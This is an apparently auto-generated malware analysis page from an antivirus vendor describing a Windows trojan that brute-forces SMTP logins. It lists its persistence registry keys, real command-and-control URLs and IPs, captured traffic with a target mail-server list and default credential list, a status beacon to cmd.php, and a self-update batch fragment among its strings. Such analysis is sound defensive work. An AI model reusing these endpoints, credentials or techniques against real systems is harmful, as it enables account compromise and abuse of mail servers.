Trojan.GenericKD.2177667_453ec0c6a7

Trojan.Win32.WPCracker.db (Kaspersky), Trojan.GenericKD.2177667 (B) (Emsisoft), Trojan.GenericKD.2177667 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS) Behaviour: Trojan The description has been a...
Blog rating:1 out of5 with1 ratings

Trojan.GenericKD.2177667_453ec0c6a7

by malwarelabrobot on March 2nd, 2015 in Malware Descriptions.

Trojan.Win32.WPCracker.db (Kaspersky), Trojan.GenericKD.2177667 (B) (Emsisoft), Trojan.GenericKD.2177667 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 453ec0c6a71b8b714369862edb9cded4
SHA1: 6e9863ac6292f3d4f485ed70f2f2fe4ad80061f1
SHA256: 9549ca377130e51ad40357f58e4f7572b19626db4b46cbb17f3e6a6e0bfb455d
SSDeep: 6144:4Sto9WM19qd1z6ukdrCKppancW6QVhnCbU0rQpejH:4StqW8q1nMrCyW6ihnJ0r
Size: 282624 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171
Company: no certificate found
Created at: 2015-02-17 16:04:45
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:1984
%original file name%.exe:696
%original file name%.exe:492

The Trojan injects its code into the following process(es):

%original file name%.exe:828

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:1984 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Application Data\System\%original file name%.exe (1425 bytes)

The process %original file name%.exe:828 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Application Data\System\libeay32.dll (7386 bytes)
%Documents and Settings%\All Users\Application Data\System\ssleay32.dll (270 bytes)

Registry activity

The process %original file name%.exe:1984 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4A 79 4E 42 BF E8 48 E4 4D 7F 6F 14 10 DB 11 65"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\All Users\Application Data\System]
"%original file name%.exe" = "453ec0c6a71b8b714369862edb9cded4"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"453ec0c6a71b8b714369862edb9cded4" = "%Documents and Settings%\All Users\Application Data\System\%original file name%.exe"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process %original file name%.exe:828 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C4 F6 52 52 5F 7F 5B D6 04 4B 4E 2C DE 22 DE B0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

Dropped PE files

MD5 File path
7a94e62ad54c62ecad385fddafe04304 c:\Documents and Settings\All Users\Application Data\System\libeay32.dll
e0cd0800a00d51025968d778d0e6b2b3 c:\Documents and Settings\All Users\Application Data\System\ssleay32.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 10210 12288 1.50698 bbb79a13385e4227f55ecb162cf098ad
.rdata 16384 874 4096 0.942361 5100832a0812ee7823886a52bd9f9f5e
.data 20480 262144 262144 4.88166 11e88bae124b9c1f246e4ae06b627088

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://178.63.29.34/ssl/ssleay32.dll
hxxp://178.63.29.34/temp_brut/42883.txt
hxxp://178.63.29.34/login.txt
hxxp://178.63.29.34/cmd.php
hxxp://maydayflower.od.ua/login.txt
hxxp://maydayflower.od.ua/temp_brut/42883.txt
hxxp://maydayflower.od.ua/ssl/ssleay32.dll
hxxp://maydayflower.od.ua/cmd.php
mail.hotnewhiphopmusic.net 173.203.187.14
mail.adammurciano.net 69.57.4.3
topshelforthopaedics.net 69.50.1.18
depressioncause.net 31.22.4.72
fukugyoh.net 203.189.105.167
smtp.ejctrans.net 163.177.65.157
jrmackenzie.net 192.185.98.226
lonnietimmonsiii.net 50.87.150.232
music2010.net 210.188.201.134
smtp.amallia.net 213.245.2.3
smtp.wyattfilms.net 66.175.58.40
infocopia.net 84.246.231.3
ozcanlarotomotiv.net 108.167.182.83
visible-horizons.net 66.96.163.137
medhorn.net 74.220.219.79
smtp.enogastrofonia.net 62.149.128.203
mail.vltict.net 91.208.80.44
smtp.gvdk.net 64.29.151.235
ikashika.net 210.140.19.229
powerclubgym.net 173.254.32.93


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN FortDisco Reporting Status

Traffic

GET /temp_brut/42883.txt HTTP/1.0
Host: maydayflower.od.ua
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)


HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 01 Mar 2015 16:41:42 GMT
Content-Type: text/plain
Content-Length: 118726
Connection: keep-alive
Last-Modified: Sun, 01 Mar 2015 16:41:38 GMT
ETag: "4e6025d-1cfc6-5103cc681ce4d"
Accept-Ranges: bytes
Vary: Accept-Encoding
smtp.eatatmyplace.net:465..ismerkedes.net:465..mail.the-real-bunker-co
mpany.net:25..coloradoconcerts.net:25..beatboxtutorial.net:25..mail.re
albunkercompany.net:25..mail.therealbunkercompany.net:25..depressionca
use.net:465..abrasileirinha.net:25..exao.net:465..candidconcepts.net:4
65..m-kaitori.net:465..ejaculationproblems.net:465..smtp.private-job.n
et:25..m7g7.net:465..ozonedevelopment.net:465..smtp.amallia.net:25..da
ilypaypros.net:465..smtp.pointeclair.net:465..mail.iuvat.net:465..mail
.mirandaenunes.net:25..mail.benjaminsebastian.net:465..kazcutzhairdres
sing.net:465..acimac.net:465..smtp.wallpaperhangers.net:25..smtp.wyatt
films.net:465..longaeva.net:25..smtp.dinovia.net:465..smtp.victorystor
es.net:25..mail.sanjosecolocationfast.net:25..tipacti.net:465..saveoma
tic.net:465..mtleone.net:465..smtp.talent-sportif.net:465..smtp.nycarp
etcleaning.net:465..bagcomputer.net:465..tomkitzmiller.net:25..radiosa
j.net:25..gewoonbijzonder.net:465..foxyevents.net:465..internetonlinem
arketing.net:465..theheartlandnews.net:25..torihachi-chaya.net:25..cya
nimal.net:465..curiousbrain.net:465..nounonline.net:465..nanbu-utagoe.
net:25..iqdomain.net:25..de10.net:25..merrylandswest.net:25..fofans.ne
t:465..mb-works.net:25..mail.vltict.net:25..powerclubgym.net:465..smtp
.mangakoaching.net:465..smtp.designdecollection.net:465..ishiihidetake
.net:465..contramao.net:25..smtp.scurdeniser.net:465..volesworld.net:4
65..asianrealitypass.net:25..smtp.ciaobellabag.net:465..mystrength.net
:465..travelprizes.net:25..smtp.lampenkatalog.net:465..mail.bonoui
<<< skipped >>>


GET /ssl/ssleay32.dll HTTP/1.0
Host: maydayflower.od.ua
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)


HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 01 Mar 2015 16:41:40 GMT
Content-Type: application/x-msdos-program
Content-Length: 270336
Connection: keep-alive
Last-Modified: Tue, 16 Dec 2014 03:45:50 GMT
ETag: "4e6007b-42000-50a4d31ee1780"
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........y4.D.Z.D.Z.
D.Z.M`..G.Z.M`..F.Z.M`..C.Z.D.[...Z.M`..y.Z.M`..E.Z.M`..E.Z.M`..E.Z.Ri
chD.Z.........................PE..L.....DS...........!................
......... ...............................`......R.....................
..............p$..L...P.... .......................0..|#..0&..........
....................(...@............ ...............................t
ext............................... ..`.rdata..@.... ..................
....@[email protected][email protected]........ ........
..............@[email protected][email protected]............
......................................................................
......................................................................
......................................................................
......................................................................
............................................3..|$.....H%P&............
.......P&.............3..|$.....H%.&.............................~4. .
... ..u............F4.N<W.y.9F4.......FD..... .R..PV.g>....... N
D...;.}.PjjV..?....._Y..FD......G...tP....t)j.V.<2..h(...h<'..h.
...jjj............_Y.h ...h<'..h....jjj............_Y......O.......
..;.}........W..NT.............G...W..NT................G...W..NT.....
....Ad......wX.F4. ...FT.V<............S.Z..PdU.l.....?..vTj.V.d1..
hC...h<'..h(...jjj..,......][..._Y.j.V.91..h7...h<'..h....jj
<<< skipped >>>


GET /login.txt HTTP/1.0
Host: maydayflower.od.ua
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)


HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 01 Mar 2015 16:41:43 GMT
Content-Type: text/plain
Content-Length: 134
Connection: keep-alive
Last-Modified: Fri, 06 Feb 2015 12:23:54 GMT
ETag: "4e40faf-86-50e6a7e787c9d"
Accept-Ranges: bytes
Vary: Accept-Encoding
info@{domaincut}.{zone}..test@{domaincut}.{zone}..admin@{domaincut}.{z
one}..{domaincut}@{domaincut}.{zone}..123cad..admin..auditicia....



POST /cmd.php HTTP/1.0
Host: maydayflower.od.ua
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)
Content-Type: application/x-www-form-urlencoded
Content-Length: 8

status=1
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 01 Mar 2015 16:41:43 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.4-14 deb7u12
Vary: Accept-Encoding







The Trojan connects to the servers at the folowing location(s):







%original file name%.exe_828:




.text
`.itext
`.data
.idata
.didata
.rdata
@.rsrc
TArray<System.Byte>
TArray<System.Char>
System.Types
!"#$%&'(!)* ,-./0'
System.SysUtils
ENoMonitorSupportException
TFormatSettings.TEraInfo
System.SysUtilst-A
TArray<System.string>
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
Uh.cA
&TArray<System.SysUtils.TUnitHashEntry>
iMaxUdpDg
sin_port
sin6_port
0.0.0.0
127.0.0.1
255.255.255.255
getservbyport
THookVerifyCert
LT_SSHv2
Port
ResolvePort
GetLocalSinPort
GetRemoteSinPort
FSocksPort
FSocksPassword
FSocksResponsePort
FSocksLocalPort
FSocksRemotePort
FBypassFlag
SocksPort
SocksPassword
FHTTPTunnelIP
FHTTPTunnelPort
FHTTPTunnel
FHTTPTunnelRemoteIP
FHTTPTunnelRemotePort
FHTTPTunnelUser
FHTTPTunnelPass
FHTTPTunnelTimeout
TTCPBlockSocket&
TTCPBlockSocket
HTTPTunnelIP
HTTPTunnelPort
HTTPTunnelUser
HTTPTunnelPass
HTTPTunnelTimeout
HTTPTunnelTOB
FOnVerifyCert
FKeyPassword
FCertificateFile
FPrivateKeyFile
FCertificate
FPrivateKey
FCertCA
FCertCAFile
FTrustCertificate
FTrustCertificateFile
FVerifyCert
FPassword
FSSHChannelType
FSSHChannelArg1
FSSHChannelArg2
FCertComplianceLevel
GetCertInfo
GetVerifyCert
KeyPassword
Password
CertificateFile
PrivateKeyFile(
Certificate(
PrivateKey(
TrustCertificateFile(
TrustCertificate(
CertCA
CertCAFile
VerifyCert
SSHChannelType
SSHChannelArg1
SSHChannelArg2
CertComplianceLevel
OnVerifyCert
FTargetPort
TargetPort
httpsendex
FAlivePort
FProxyPort
FProxyPass
FAddPortNumberToHost
THTTPSend,
HTTPMethod
THTTPSend
ProxyPort
ProxyPass
AddPortNumberToHost
FESMTPcap
FESMTP
FESMTPSize
TSMTPSend&
Login
TSMTPSend
smtpsendex
ESMTPcap
ESMTP
ESMTPSize
AUTH LOGIN
FSMTPSend
FHTTP
FCmdEvent
FLastCmdDate
FLastCmdDateCS
FCmdParams
TCmdGet?
TCmdGet
cmdget
LastCmdDate
Winapi.Windows
System.UITypes
System.RTLConsts
System.SysConst
System.Internal.ExcUtils
System.Character
Winapi.PsAPI
Winapi.SHFolder
Winapi.ImageHlp
System.StrUtils
Winapi.ShellAPI
Winapi.IpExport
Winapi.Winsock2
Winapi.Qos
Winapi.Messages
Winapi.WinSock
oleaut32.dll
advapi32.dll
RegOpenKeyExW
RegCloseKey
user32.dll
kernel32.dll
GetCPInfo
shell32.dll
ShellExecuteW
SHFolder.dll
Silent_SMTP_Bruter
dSystem.SysConst
ISystem.Internal.ExcUtils
,System.Character
kWinapi.PsAPI
-Winapi.ImageHlp
System.StrUtils
"Winapi.WinSock
HTTPS
%d.%d.%d.%d
ws2_32.dll
owship6.dll
Synapse TCP/IP Socket error %d: %s
Operation would block
Operation now in progress
Operation already in progress
Socket operation on nonsocket
Protocol not supported
Socket not supported
Operation not supported on Socket
Protocol family not supported
Address family not supported
Winsock DLL cannot support this application
0.0.0.1
HTTP/1.0
HTTP/
SSL/TLS support is not compiled!
Without SSL support
Mozilla/4.0 (compatible; Synapse)
HTTP/
LOGIN
ssleay32.dll
libssl32.dll
libeay32.dll
SSL_CTX_use_PrivateKey
SSL_CTX_use_PrivateKey_ASN1
SSL_CTX_use_RSAPrivateKey_file
SSL_CTX_use_certificate
SSL_CTX_use_certificate_ASN1
SSL_CTX_use_certificate_file
SSL_CTX_use_certificate_chain_file
SSL_CTX_check_private_key
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_get_peer_certificate
X509_set_pubkey
EVP_PKEY_new
EVP_PKEY_free
EVP_PKEY_assign
RSA_generate_key
i2d_PrivateKey_bio
DES_set_key_checked
smtp.­dr%
application/x-www-form-urlencoded
smtp.
{login}
{loginfull}
cmd.php
checkres.php
bruteres.php
login.txt
status=%s
ssl/libeay32.dll
ssl/ssleay32.dll
upd.tmp
upd.bat
set fl="%s"
del /q %%fl%%
if exist %%fl%% goto dl
move /y "%s" %%fl%%
start "" %%fl%%
Error loading Socket interface (ws2_32.dll)!
Advapi32.dll

%original file name%.exe_828_rwx_00400000_00049000:




.text
`.itext
`.data
.idata
.didata
.rdata
@.rsrc
TArray<System.Byte>
TArray<System.Char>
System.Types
!"#$%&'(!)* ,-./0'
System.SysUtils
ENoMonitorSupportException
TFormatSettings.TEraInfo
System.SysUtilst-A
TArray<System.string>
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
Uh.cA
&TArray<System.SysUtils.TUnitHashEntry>
iMaxUdpDg
sin_port
sin6_port
0.0.0.0
127.0.0.1
255.255.255.255
getservbyport
THookVerifyCert
LT_SSHv2
Port
ResolvePort
GetLocalSinPort
GetRemoteSinPort
FSocksPort
FSocksPassword
FSocksResponsePort
FSocksLocalPort
FSocksRemotePort
FBypassFlag
SocksPort
SocksPassword
FHTTPTunnelIP
FHTTPTunnelPort
FHTTPTunnel
FHTTPTunnelRemoteIP
FHTTPTunnelRemotePort
FHTTPTunnelUser
FHTTPTunnelPass
FHTTPTunnelTimeout
TTCPBlockSocket&
TTCPBlockSocket
HTTPTunnelIP
HTTPTunnelPort
HTTPTunnelUser
HTTPTunnelPass
HTTPTunnelTimeout
HTTPTunnelTOB
FOnVerifyCert
FKeyPassword
FCertificateFile
FPrivateKeyFile
FCertificate
FPrivateKey
FCertCA
FCertCAFile
FTrustCertificate
FTrustCertificateFile
FVerifyCert
FPassword
FSSHChannelType
FSSHChannelArg1
FSSHChannelArg2
FCertComplianceLevel
GetCertInfo
GetVerifyCert
KeyPassword
Password
CertificateFile
PrivateKeyFile(
Certificate(
PrivateKey(
TrustCertificateFile(
TrustCertificate(
CertCA
CertCAFile
VerifyCert
SSHChannelType
SSHChannelArg1
SSHChannelArg2
CertComplianceLevel
OnVerifyCert
FTargetPort
TargetPort
httpsendex
FAlivePort
FProxyPort
FProxyPass
FAddPortNumberToHost
THTTPSend,
HTTPMethod
THTTPSend
ProxyPort
ProxyPass
AddPortNumberToHost
FESMTPcap
FESMTP
FESMTPSize
TSMTPSend&
Login
TSMTPSend
smtpsendex
ESMTPcap
ESMTP
ESMTPSize
AUTH LOGIN
FSMTPSend
FHTTP
FCmdEvent
FLastCmdDate
FLastCmdDateCS
FCmdParams
TCmdGet?
TCmdGet
cmdget
LastCmdDate
Winapi.Windows
System.UITypes
System.RTLConsts
System.SysConst
System.Internal.ExcUtils
System.Character
Winapi.PsAPI
Winapi.SHFolder
Winapi.ImageHlp
System.StrUtils
Winapi.ShellAPI
Winapi.IpExport
Winapi.Winsock2
Winapi.Qos
Winapi.Messages
Winapi.WinSock
oleaut32.dll
advapi32.dll
RegOpenKeyExW
RegCloseKey
user32.dll
kernel32.dll
GetCPInfo
shell32.dll
ShellExecuteW
SHFolder.dll
Silent_SMTP_Bruter
dSystem.SysConst
ISystem.Internal.ExcUtils
,System.Character
kWinapi.PsAPI
-Winapi.ImageHlp
System.StrUtils
"Winapi.WinSock
HTTPS
%d.%d.%d.%d
ws2_32.dll
owship6.dll
Synapse TCP/IP Socket error %d: %s
Operation would block
Operation now in progress
Operation already in progress
Socket operation on nonsocket
Protocol not supported
Socket not supported
Operation not supported on Socket
Protocol family not supported
Address family not supported
Winsock DLL cannot support this application
0.0.0.1
HTTP/1.0
HTTP/
SSL/TLS support is not compiled!
Without SSL support
Mozilla/4.0 (compatible; Synapse)
HTTP/
LOGIN
ssleay32.dll
libssl32.dll
libeay32.dll
SSL_CTX_use_PrivateKey
SSL_CTX_use_PrivateKey_ASN1
SSL_CTX_use_RSAPrivateKey_file
SSL_CTX_use_certificate
SSL_CTX_use_certificate_ASN1
SSL_CTX_use_certificate_file
SSL_CTX_use_certificate_chain_file
SSL_CTX_check_private_key
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_get_peer_certificate
X509_set_pubkey
EVP_PKEY_new
EVP_PKEY_free
EVP_PKEY_assign
RSA_generate_key
i2d_PrivateKey_bio
DES_set_key_checked
smtp.­dr%
application/x-www-form-urlencoded
smtp.
{login}
{loginfull}
cmd.php
checkres.php
bruteres.php
login.txt
status=%s
ssl/libeay32.dll
ssl/ssleay32.dll
upd.tmp
upd.bat
set fl="%s"
del /q %%fl%%
if exist %%fl%% goto dl
move /y "%s" %%fl%%
start "" %%fl%%
Error loading Socket interface (ws2_32.dll)!
Advapi32.dll






Remove it with Ad-Aware




    

  1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. 

  2. Update the definition files.
    3. 

  3. Run a full scan of your computer.
    4. 





Manual removal*




    

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):
    

    %original file name%.exe:1984
    %original file name%.exe:696
    %original file name%.exe:492
    

    2. 

  2. Delete the original Trojan file.
    3. 

  3. Delete or disinfect the following files created/modified by the Trojan:
    

    %Documents and Settings%\All Users\Application Data\System\%original file name%.exe (1425 bytes)
    %Documents and Settings%\All Users\Application Data\System\libeay32.dll (7386 bytes)
    %Documents and Settings%\All Users\Application Data\System\ssleay32.dll (270 bytes)
    

    4. 

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):
    

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "453ec0c6a71b8b714369862edb9cded4" = "%Documents and Settings%\All Users\Application Data\System\%original file name%.exe"
    

    5. 

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    6. 

  6. Reboot the computer.
    7. 



*Manual removal may cause unexpected system behaviour and should be performed at your own risk.












 
 




 
Average: 1 (1 vote)












				


							


			

				
					  
							

		

		


					
							

	

	
	        


	

        
      
 

      
      

      
    
 

    
  
 

		


		

		
			

			

				

					Lavasoft is the maker of Ad-Aware,
					the world's most popular anti-malware 
					software with over 450 million 
					downloads.
				

				

					© 2026 Lavasoft. All rights reserved.

					Terms Of Use |   Privacy Policy
					


								

			


		

		


	

	
	

	

		x
		
Our best antivirus yet!

		
Fresh new look. Faster scanning. Better protection.

		

			
Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

			
For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

			
			Download adaware antivirus 12
		

		No thanks, continue to lavasoft.com
	

	

		

			close x
			
Discover the new adaware antivirus 12

			
Our best antivirus yet

			Download Now